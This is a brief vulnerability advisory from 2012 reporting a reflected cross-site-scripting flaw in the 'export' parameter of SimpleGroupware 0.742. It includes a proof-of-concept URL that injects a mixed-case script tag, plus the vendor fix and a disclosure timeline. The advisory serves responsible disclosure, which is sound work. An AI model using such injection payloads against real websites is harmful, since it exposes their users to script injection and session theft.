Advisory: SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
Advisory ID: INFOSERVE-ADV2012-01
Author: Stefan Schurtz
Contact: [email protected]
Affected Software: Successfully tested on SimpleGroupware 0.742
Vendor URL: http://www.simple-groupware.de/
Vendor Status: fixed (see Changelog)
SimpleGroupware 0.742 'export' parameter XSS vulnerability
http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert('xss')</ScRiPt>
Upgrade to the latest Version 0.743
01-Feb-2012 - informed vendor
02-Feb-2012 - fixed by vendor
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt